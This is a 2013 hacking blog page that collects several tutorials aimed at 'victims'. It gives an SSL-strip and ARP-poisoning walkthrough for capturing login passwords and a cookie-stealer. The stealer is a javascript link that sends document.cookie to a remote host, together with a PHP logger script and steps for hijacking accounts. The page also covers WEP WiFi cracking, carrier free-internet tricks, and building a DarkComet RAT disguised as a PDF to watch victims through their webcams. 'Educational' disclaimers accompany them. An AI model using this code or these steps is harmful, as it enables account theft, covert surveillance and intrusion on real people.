Showing posts with label Tutorial. Show all posts
Showing posts with label Tutorial. Show all posts

Tuesday, 23 April 2013

How To Hack Using Man In The Middle Attack | SSL Hacking

Hello hacker Friends this is one of the most common attack that most hacker do to amaze people and i am gonna make it simple for you all so that you can enjoy it and try to learn this is attack so are you all ready so lets start . every one know about http attack but this is SSL means https attack nice trick  so lets begin .. :D u can watch my video on youtube ;) 

Tools Needed:



  •  SSL strip: You can search Google for SSL strip it comes both in windows and Linux versions . I will be using the windows version in this tutorial



  •  Ettercap to carry out mitm attacks..

  • Steps to Perform MITM Attack

    1. Open SSL strip and fill in all the required information for arpsoof, network ,ssl strip, change data .If you don’t know what to enter simply click auto check . remember to check if HTTPS to HTTP is included in Change data , finally click ok 


    2.Now select the victim’s IP and click open



    3. Now open ettercap go to sniff -unsniffed sniffing and select your network interface and click ok 




    4. Now select hosts-scan hosts .Once scanning is completed .Open host list from hosts tab .Now select the IP address of the router as target 1 and the victims IP as target 2


    5. Now select mitm-arp poisoning and click ok as shown 

     6. Finally select start-start sniffing .Now when the victim logs into gmail he will be using HTTP and not HTTPS Hence we are able to get the User id ,passwords 

    way2h security steps:-
    1. whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you Use HTTPS 

    2. Always check the SSL certificate before doing an online transaction

    Stay Safe.Enjoy !!
    For Educational Purpose Only

    Wednesday, 17 April 2013

    How to hack into an email/facebook/any account - Cookie hijacking


     yesterday  i got mail about cookie hijacking so i find the best way to do and i post it enjoy

    Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
    What is a Cookie Logger?

    A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

    Today I am going to show How to make your own Cookie Logger


    Note :- This Tutorial is For Education Purpose Only… & Its For Better Security For Ur Self…


    Step 1  :- First you have to create a file which can capture a person's cookie.So follow the following process.  

    this is last step actually ↓ 

      Give this code to victim to run in his browser (notice that here site name is way2h.blogspot.com)


    javascript:document.location='http://way2h.blogspot.com/cookie.php?ex='.concat(escape(document.cookie)); 


    Step 2 :- Now you have to change "http://www.way2h.blogspot.com/" to your site, Remember one thing you should not upload the files into a directory.


    Step 3 :- Copy the Following Script into a Notepad File and Save the file as cookie.php:

      <?php
    $filename = "logfile.txt";
    if (isset($_GET["ex"]))
    {
    if (!$handle = fopen($filename, 'a'))
    {
    exit;
    }
    else
    {
    if (fwrite($handle, "\r\n" . $_GET["ex"]) === FALSE)
    {

    exit;
    }
    }

    header("Location: http://ilovemessenger.msn.com");
    fclose($handle);
    exit;
    }
    exit;
    ?>


    Upload this file to your server

     cookie.php -> http://www.yoursite.com/cookielogger.php

    If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

    www.ofees.net
    www.t35.com
    www.ripway.com
    http://my3gb.com/
    http://000webhost.com/

    Step 5:- Now your cookie logger is ready to be used. Now All U Had To Do is Find The Victim & Try Cookie Logger / Cookie Stealer On Them…

    Note :- Give Ur Victim The Link Of GIF File… 

    javascript:document.location='http://way2h.blogspot.com/cookie.php?ex='.concat(escape(document.cookie)); 

    So the person who click it will think it is fun but it redirects to http://ilovemessenger.msn.com


    Step 6 :- So if anyone open you it  will get a the cookie in the logfile.txt


    Step 7 :- And something like this will be stored in your "logfile.txt"

     phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

    Step 8 :- To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

    Now for this you will need a firefox addon named "Add and edit cookies" 

    Note :- Make Sure that ur Victim should be Online because u are Hijacking ur Victim’s Session…


    So if the Victim clicks on Logout you will also Logout automatically…
    but once you have changed the password then you can again login with the new password… but the victim would not be able to login with it…

    MUST READ :- I don’t take any responsibility for what you do with this script…Its Only for Educational purpose only…


    How To Get Secure From Cookie Loggers / Cookie Stealer ???

    •  use NO SCRIPT (its a firefox addon )  this is best rest of other :P
    • Don’t Click On Any Links Given By Anyone…
    • Use Secure Connection Security In Facebook…
    • Use Login Notifications For Better Security…
    • Don’t Click On SPAM Links Videos Or Pics…
    • Never Ever Try RATS or KeyLoggers…
    • Be Safe…Don’t Use Any Softwares For Hacking…Coz All Are Fakes…
    • Hacking is Not Playing With SomeOne’s Account… 
    • Real Hacking is Much More Than It…
    All The Hackers are Not Same… We are Humans & We Had Heart Also…

    Wednesday, 10 April 2013

    How to Hide IP address | Change IP address | maximum anonymity

    Hiding your IP address is really important when it comes to Hacking. You must hide your original IP address while trying to hack something.
    Hiding your IP address will prevent the legal authorities from tracing you back.
    It will also prevent from other hacker’s attacks. That is why one should seek for the maximum anonymity while surfing or hacking online.
    Some hackers use web based proxies or port proxies but those proxies are not useful and even use of these proxies lead to a security loop. Owner of that proxy can set a data sniffer on its server so what so ever you do will be recorded. All your login details or any other data will be logged there.

    Disadvantages of FREE proxies :

    1) They are really slow.
    2) They are harmful and will surely lead to your own security loop.
    3) They are not completely anonymous – You can still be tracked down by legal authorities.

    Instead of using Free web based proxies I myself use HMA Pro VPN. This tool by HMA is uber cool.
    Advantages of HMA pro VPN :
    1) Proxies are completely anonymous. No one can trace you back if you are using paid version of HMA pro VPN.
    2) You can change your ip address every minute. They have got an option which automatically changes your ip address after specific time interval.
    3) You can choose proxies of specific countries. Just one click and it will change your ip address to a specific country’s IP address.
    4) The data transferred is encrypted automatically so that no one else can see what we are doing which is the best part about this HMA Pro VPN.


    Hide My ass Pro VPN | How to change your IP address

    Saturday, 6 April 2013

    How to transfer balance from mobiles? For All Networks

    We often see that our friends have lots of balance in their mobiles and we wish to have a little from it. You can do it now by following the below steps :D
    Choose the network below and follow the steps :) 

    For Aircel Users :
    To Transfer the Balance you just need to Dial *122*666# and Follow the Instructions...
    You Can Transfer Rs, 5,10,15,25,50,75,100!!


    For Idea Users :
    To Transfer the Balance just Send SMS as GIVE MobileNumber Amount And Send It To 55567.
    E.g. GIVE 9676555212 30 To Transfer 30 Rupees.


    For Vodafone Users :
    To Transfer the Balance you just need to Dial *131*Amount*Mobile No#
    E.g
    . *131*50*9975426210# To Transfer 50 Rupees Of Balance.

    For Uninor Users :
    To Transfer the Balance you just need to Dial *202*MobileNumber*Amount#
    E.g. *202*97755210*30# To Transfer 30 Rupees.


    For BSNL Users :
    To Transfer the Balance Just Send SMS GIFT MobileNumber Amount To 53733.
    E.g. GIFT 9487677710 50 To Transfer 50 Rupees Of Balance.

    enjoy :) 

    Tuesday, 19 March 2013

    Free BSNL 3G Hack & Trick 2013 ( 100% Working )

    Hello Friends !! here is in 2013 latest fast proxy trick for BSNL  Network Users. This trick is working with Resume support with downloads and with YouTube, Facebook too. You can download by very fast speed also.This trick is working with 2G and 3G both.So just use it and enjoy super fast 3G speed for free.

    it is also tested by me your admin jixxi :P so i guess its working

    Trick 1
    Use the Following New Connection For Free :-

    1. Name :3G free(any) 
    2. Service Type 1
    3.  WAP Gateway IP : 1 10.100.3.2 
    4. Port no : 1 : 9209. 
    5. Timeout: Never 
    6. CSD No.1 
    7. User Name1: ppp 
    8. Password1: ppp123 
    9. APN setting: wapwest.cellone.in 
    10. User Name : ppp 
    11. Password : ppp123
    Now save the following settings and  leave the other settings as default and using this activated settings hack bsnl 3G for free new 2012 trick in bsnl mobile free for 3mbps speed browsing and downloading in bsnl 3G.

    OR

    Trick 2 :

    Requirements:-

     1) You Must Have the 3G Supported Device . 2) 3G Activated SIM ( if you are not using 3G sim it is easy to change the plan to 3G)

     Knowledge about the changing of your internet settings. Change your Internet Settings with the Following Details :-

    Name :- BSNL 3G Service
    Type 1 WAP
    Gateway IP : -1 10.100.3.2
    Port no : 1 : 9209.
    Timeout: NEVER
    CSD No.1
    User Name1: ppp
    Password1: ppp123
    APN setting: wapwest.cellone.in
    User Name : ppp
    Password : ppp123
    By Using this Settings , you have the free internet service at 3 MBPS Speed.




    Vodafone 2G & 3G Hack 2013 With Super Fast Speed By way2h

    Hi Friends Today i will share the vodafone internet trick for 2013 .By this Trick you will get 6 GB Free Internet Data for 6 Months .This Latest Trick Already Tested before published in Rajasthan,Punjab,Haryana,West Bengol and other places .So hurryup



    Process :-
    Proxy Settings for Vodafone unlimited 3g Hack:-
    Make these Settings as Below :-
    Account Name:- HackingHomeMobileTrick
    home page : live.vodafone.in
    proxy:- 10.10.1.100
    apn:- portalnmms
    port:- 9401 or 8799

     just type ACT FB and then send the message to 144
    after you will get conformation  msg and free internet for 6 month

    if you want increase your internet data then try this again after 6 month

    so enjoy and yeha keep your bal low \m/ comment if not working :)

    Airtel 3G Unlimited GPRS Trick And Hack With Fastest Proxy 2013

    Follow the Instructions Below :-
    1. Create A New Airtel Manual Settings
    2. Apn : airtelgprs.com
    3. Proxy : 208.77.23.4
    4. Port : 80
    5. Home Page : fb.me
    6. If Its Not Working Try live.airtelworld.com
    7. ....... read more click here 

    CRETE ACCOUNT LOGIN AND READ REST OF THE TRICK 

    Friday, 15 March 2013

    Hack a WiFi Network In 8 Easy Steps.( Using Windows)

    It takes about 5-6 hours if the password is weak a high signal of the WiFi network you are going to hack and you have sometimes 10-12 for more complicated passwords and if the WiFi signal of the Network is weak .The time taken also changes if the WiFi network you are going to hack has many other clients already accessing it .  


    those who know how to hack using backtrack please don't laugh its for beginner 
    Tools needed :

    Packet sniffer:
    * Commview for WiFi ( check it website and see if ur wifi card is supported https://www.tamos.com/
    products/commwifi/adapterlist.php )
    { get the 30 day trial or use the free full version available on net from other sites.) (i recomment the 30 day trial because it will be the latest ) after it expires y can always go to other means.

    You will use this tool for capturing the packets sent and recieved through the Access Point you are going to hack .The more packets you capture the better chances of cracking the password .You will need more than 1,00,000 minium packets to crack the password .The packets will be captured in the .ncp format .You will use this tool to convert the .ncp to .cap .

    NOT MANY NETWORK CARDS ARE SUPPORTED SO PLEASE CHECK YOUR NETWORK ADAPTER IN DEVICE MANAGER. IF it is not supported then there is no other option then to use backtrack with extra hardware.

    Decrypter :

    * Aircrack suite (http://www.aircrack-ng.org/)
    You will use this tool to crack the password of the Access Point using the . Cap files you obtained from the Commview application .

    NOTE  :
    You will need a packet sniffing program (we will use Commview for WiFi) and not airodump-ng ( already integrated in aircrack suite).

    Or if YOU can get another packet sniffer that support your card then use it instead of commonview.


    Now Get Ready to Hack :

    Step 1 : Install CommView for WiFi . It doesnt matter whether you install it in VoIP mode or Standard mode . I used VoIP . It automatically installs the necessary drivers . Allow it to install .

    Note :- You will not be able to connect to any Network using WiFi when using CommView .

    Step 2 : Click on the PLAY ICON in the Left First .

    Step 3 : (Choosing the Network (a) ) : A new window should pop up now. Click on the START SCANNING button .
     
     
    Step 4 : (Choosing the Network (b) ) : Click on the WiFi network you want to hack in the Right Coulumn and Click on CAPTURE.


    Note :- This tutorial is only for WEP protected networks .
     
     Step 5 : (Capturing the Packets) : The windows should close now and you should see that CommView has started Capturing Packets .
     Step 6 : (Saving the Packets ) : Now that the Packets are getting captured you need to Save them. Click on Settings->Options->Memory Usage Change Maximum Packets in buffer to 20000.
     
     
     
     
    Click on the LOGGING Tab .
    Check AUTO-SAVING
    In the Maximum Directory Size : 5000
    Average Log File Size : 50
     
     
    Now CommView will automatically Start Saving packets in the .ncp format at a size of 20MB each in the specified directory .

    Step 7 : ( Concatenating the Logs ) : Since you are capturing a lot of logs you will need to concatenate them into once file . To do this go to Logging and click on CONCATENATE LOGS Choose all the files that have been saved in your specified folder and Concatenate them .

    Now you will have one .ncf file .

    Step 8 : (Converting .ncf to .cap ) : Now that you have one file with all the packets you need to Convert it into .cap file for AIRCRACK to crack .

    Click on File->Log Viewer->Load Commview Logs-> Choose the .ncf file. Now File->Export->Wireshark/TCP dump format .

    Aircrack Part :

    Now for the Second Part Cracking this is very simple . Just open the Aircrack Folder->Bin->Aircrack-ng GUI.exe Choose the .cap file and you should be able to do the others .
     Also select the encryption(WEP or others) and Key size (64). Press launch and the key will be revealed.
    or try other settings if not working.

    Wednesday, 13 March 2013

    ARP Poisoning - FULL EXPLANATION

    Being one of the most active members in this WiFi board I can see that a lot of people don't understand this in depth but they only know why are we using it and what is the result. In this thread I will explain to all of you that already know something about this and to all of you that doesn't know a thing for this what exactly is ARP and ARP Poisoning. In this thread I will explain what actually happens in the background of the attack.


    What is ARP ?


    ARP Poisoning is one of the most famous network hacking attacks but only a few people understand what happens in the background. In order to understand this attack better first I will explain what exactly is ARP. ARP or Address Resolution Protocol is a network protocol that resolves IP addresses to MAC addresses. It is a protocol that connects the Logical Addressing(IP) with the Physical Addressing(MAC) of the networking scheme. In networking you have Layers. Imagine them as different levels. Each layer/level has his own job. These are the 7 Layers according to the OSI Model:

     The Address Resolution Protocol is between the NETWORK LAYER and the DATA LINK LAYER. I know that this looks a bit strange for those of you who haven't worked with networking but if you read a bit about the layers you will understand it better. So once again... ARP is in charge of RESOLVING IP ADDRESSES TO MAC ADDRESSES.


    ARP Poisoning


    Now that you understand what ARP is I can explain the ARP poisoning to you. I am not sure when exactly but people found a way to trick the ARP. Actually ARP Poisoning is a process where we send a fake or "spoofed" ARP messages to a LAN. Those actually resolve the gateway IP address to our MAC address. There for all the traffic that is meant to be for the gateway goes through US ( this is not the UNITED STATES !!! Roflmao ). So actually what we do is we tell the gateway that we are the slave and we tell the slave that we are the gateway. Illustrated it looks like this:

     In this image the attacker performed ARP poisoning between 2 users on the networks. Therefor each traffic that is from slave A for slave B will first go through the attacker and then he will resend it to its original destination. And vise versa. Each traffic from slave B for slave A goes through the attacker. That is why ARP Poisoning is used for sniffing. All the traffic goes through you and you can analyze the packets passing by with no problems.



    Saturday, 9 March 2013

    DarkComet V4.2 RAT TUTORIAL

    If you are not new to RATs, you should have heard the word DarkComet. Because DarkComet is such a great tool for hacking remote computers. It has several features that many RATs do not have. I have explained the basics of RATs and Setting up Extreme RAT in my previous articles. So before proceeding into this article, you must understand the basics of RATing. So please go through those articles first. You can read them from here.

    Things you require

    1) DARK-COMET RAT

    This is the RAT you are going to use. You can get it from HERE.

    2) No-ip.biz  account

    As our IP-Address is dynamic(in general), we need to make it static.

    3) DUC client

    We can automatically update our dynamic IP-Adress, by installing DUC client.

    4) VPN (If you are behind a router)  VPN is here  also know what vpn is

    We must enable our router to allow us to connect to a remote PC. So we need to port forward.
    Instead of port forwarding we use a VPN(Virtual Private Network).
    You can use Proxpn. and any other you know (its not needed but good if u use) 

    Procedure:
     
    Step 1:

    First you need to create an account in www.no-ip.com

    Step 2:

    After creating an account, login with your account and create a host. You can do this by just following the steps.

    Goto this link, and login. Then follow the steps as shown in the picture.
     
     
     
    Finally click “Create Host”.

    Step 3: Setting up your server.

    First install Dark-Comet RAT on your PC and run it. It opens a window as shown below.
     
    Now click on the + button which is at left bottom corner as shown below. 
     

     It opens a small window showing you the port number. Click on “listen” button.


    Then it disappears, don’t click the “listen” button again. Now click on “edit server” button at the bottom of the window as shown in the figure.

     It opens a new window with huge amount of options. First lets move on to the main settings. You can set a password to use when listening connections. You can see the default password by checking “security password” and “show chars” in the following picture.

    Now we need to set up our “network settings”. Clearly follow the steps here. You need to give your domain name you got from no-ip.com
    It looks like yourdomain.no-ip.biz
     
      
    We came to the funniest part of our RAT setup. Here you can choose your icon. DarkComet is providing us some beautiful icon. So that our victim can easily believe us. Just follow steps  shown in the figure. It is self explanatory.
     
     
    You can bind your server file with a PDF or Image. So when the victim clicks it, it opens the PDF file and the victim will not be able to suspect you. You can follow the steps as shown in the figure. 
    Finally click on “Build Server” button. It creates a new server file in the same directory where your dark-comet files are stored.

    You are done. 
     Now give your server file to your vicyim by any means. When  he clicks the server file, he will be connected to your computer.

    Now you can do anything you want. You can see him with his web cam, downloading files and many more. Just move around the options and play with him. I put two screenshots of how it looks like when you get access to his computer. 

    Using RATs on remote systems without their permission is illegal. This article is for educational purpose only. Don't do anything illegal. I will not be held responsible for that.

    Thursday, 7 March 2013

    DarkComet Features & How To Use Them


    DarkComet Features & How To Use Them


    What is DarkComet?

    DarkComet-RAT (Remote Administration Tool) is software design to control in the best condition and confort possible any kind of Microsoft Windows machine since Windows 2000.
    This software allow you to make hundreds of functions stealthly and remotely without any kind of autorisation in the remote process.
    This software is a long time project,started the August 2008,DarkComet-RAT is now one of the best and one of the most stable RAT ever made and totally free.

    What features does this RAT have?

    DarkComet has many, many features. Below, I will list the most important ones, & what they are used for. The features are under different categories. I will post a picture of the categories, along with each feature that is inside of it.

    1. System Info
    • System Monitor
    • Computer Info
    • Trace Map
    ....


    System Monitor: The System Monitor feature allows you to monitor the system which you have infected. From here you can see the CPU Usage & the Ram Usage of your slave.

    Computer Info: In Computer Info, you can see various amounts of information having to do with Server Connection, Server General Information, BIOS Information & Server Settings Information.

    Trace Map: Here, you can look up a lot of information about where you slave lives. Some of the data that you can see is the IP Address, the Longitude & Latitude, the Timezone & various other pieces of information.

    2. Fun Functions
    • Fun Manager
    • Piano
    • Message Box
    • Microsoft Reader
    • Remote Chat


    Fun Manager: Here you can do various factors to annoy your slave, such as open & close the CD tray, hide clock, disable task manager, hide desktop & many more other features.

    Piano: Here, you can click on a virtual keyboard, & what ever key you click, it will be played to your slave.

    Message Box: Here you can enter a title & some text, & it gets sent to your slave as a message box.

    Microsoft Reader: Here you can input text, & when you click "Read", it is read to your slave in Microsoft's default voice.

    Remote Chat: Here, you have the opportunity to remotely talk to your slave. Once you sned a message, a chat box shows & your slave has the option to send a message back, or simply close & ignore it.

    3. File Manager
    • Explore Files
    • Search For Files


    Explore Files: Here, you can go through your slaves files, & you can even receive files from their computer & send files from your computer to theirs.

    Search For Files: Here, you can search for a specific file name, type & where it is stored.

    4. Spy Functions
    • Webcam Capture
    • Sound Capture
    • Remote Desktop
    • Keylogger



    Webcam Capture: Here you can see through your slaves webcam, if they have one.

    Sound Capture: Here you can hear through your slaves microphone, if they have one.

    Remote Desktop: Here, you can see everything that they are doing, & even take over & control the computer yourself.

    Keylogger: Here, it stores everything that they have typed, while you have been offline. When you are online, & they are connected to the DarkComet client, it will not record logs. If you want, you can set the logs to be sent to a webhost.

    5. Update Server
    • From Url
    • From File


    From Url: Here, you can update your server via a Url (Direct Link). You may want to update your server, incase it becomes detected by anti-viruses, & you have re-crypted it.

    From File: Here, you can update your server by sending a file on your computer, to theirs. You may want to update your server, incase it becomes detected by anti-viruses, & you have re-crypted it.


    All credits to this tutorial go to Text. It has taken me around an hour to make this tutorial. The least you can do is say thanks.